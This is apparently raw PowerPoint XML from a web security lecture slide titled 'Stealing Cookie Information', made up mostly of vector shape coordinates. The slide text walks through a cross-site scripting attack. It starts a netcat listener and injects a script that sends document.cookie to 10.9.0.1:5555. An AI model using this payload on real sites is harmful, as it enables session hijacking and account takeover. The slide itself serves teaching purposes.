                    <a:pt x="107442" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107823" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107950" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107866" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="347218" y="134620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="308101" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310769" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313690" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320548" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323342" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326008" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328295" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330073" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331977" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333501" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335915" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336803" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340232" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340868" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342137" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343534" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345948" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346836" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347472" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347979" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348742" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349123" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348996" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348233" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="64770" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60959" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60325" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64389" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4191" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="125729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="129539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5460" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8127" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11683" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14731" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17145" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21081" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28067" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89661" y="16510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89534" y="15239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89026" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88519" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83439" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81660" y="7620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79121" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="2539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69087" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66928" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64770" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="241934" y="113029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239268" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241300" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241934" y="113029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="248094" y="88900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207264" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209676" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215265" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219075" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231775" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233552" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235076" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238505" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242570" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245236" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245872" y="107950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247650" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249047" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249554" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250062" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250571" y="92710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249808" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248920" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="142494" y="35560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136525" y="35560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135127" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="54610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159257" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160908" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163068" y="49529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163322" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144399" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="35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D8DB505A-8075-FDBD-DE45-93D56A329604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="717550"/>
            <a:ext cx="9158605" cy="2552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1184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We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inject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script that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send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> 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cookies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whoever</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="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is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visiting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our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page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TCP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server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>we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1. 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separate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terminal,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start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netcat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server!</a:t>
            </a:r>
            <a:endParaRPr sz="18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  <a:spcBef>
                <a:spcPts val="565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nc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–lknv</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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5555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00" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>you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https://webhook.site/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="60" dirty="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which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gives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you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termporary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URL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listen</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> from)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F47CCEF-8B13-625A-C075-42F6896D1F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540" y="3741801"/>
            <a:ext cx="7232015" cy="70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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> Inject malicious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script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website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600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.write('&lt;img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src=http://10.9.0.1:5555?c='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+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B81DDE6-EFF4-E5CD-0400-BA79BA77088C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7345680" y="4230496"/>
            <a:ext cx="2932430" cy="230504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635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>escape(document.cookie)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E622378-79D6-1967-BA80-1353E8FFE0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10266426" y="4181678"/>
            <a:ext cx="1978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+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'&gt;');&lt;/script&gt;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C3340361-C70C-7381-F854-88F1525B03C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035045" y="4528565"/>
            <a:ext cx="7862570" cy="247015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7862570" h="247014">
                <a:moveTo>
                  <a:pt x="7862315" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7860690" y="48059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856267" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7849725" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7841742" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3951731" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3943748" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937206" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3932783" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3931157" y="246887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3929532" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3925109" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3918567" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3910583" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20574" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12590" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6048" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625" y="48059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A8B63646-BA6F-681A-0D09-4719E0C5C5B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383540" y="4913121"/>
            <a:ext cx="1122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“trap”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bogus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image.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when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someone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else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tries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load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issues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10.9.0.1:5555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4C76D413-AC3D-8535-FDD4-4B21C9884235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495547" y="5627928"/>
            <a:ext cx="408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does</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> it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DDD06275-D443-A263-DD08-24D8ECCBED29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634731" y="5663971"/>
            <a:ext cx="3474085" cy="25654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current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user’s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session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cookie!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68681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9A76C9B8-79A6-5F17-DAF3-7F6554EFB64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148" y="5373623"/>
            <a:ext cx="5385816" cy="1202436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D618EF5C-B8B5-8B6D-1A27-8BC31428E2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837" y="46482"/>
            <a:ext cx="4071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Stealing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Cookie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Information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5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C0EB8C-1502-41B1-40B4-243E86367DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8447531" y="44196"/>
            <a:ext cx="3714115" cy="2496820"/>
            <a:chOff x="8447531" y="44196"/>
            <a:chExt cx="3714115" cy="2496820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D557B3-418D-3497-0136-54EC826F5F3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47531" y="44196"/>
              <a:ext cx="3713987" cy="2496312"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFACC14-7918-C2CA-CDC8-106567A340FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="163792" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81952" y="12777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24959" y="47048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266" y="133346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626573" y="449245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683595" y="414976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707257" y="328666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EA7A4B-ACBD-7D75-B4B2-F127E4984A62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="7963" y="72199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49913" y="27235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163792" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697293" y="294944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700621" y="389826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658622" y="434789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11208" y="167053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7963" y="7219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8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B690CD-4E8C-2A6A-486F-890DD28A66F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10609198" y="1264284"/>
              <a:ext cx="349250" cy="254000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="232155" y="199389"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="230124" y="199389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229489" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227965" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227202" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224790" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223900" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222376" y="212089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="214629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220852" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221233" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="224789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225678" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="231139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232664" y="236220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235584" y="238760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242697" y="243839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251332" y="247650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264668" y="252729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271399" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284479" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273430" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267589" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236093" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234823" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233806" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232791" y="200660"/>
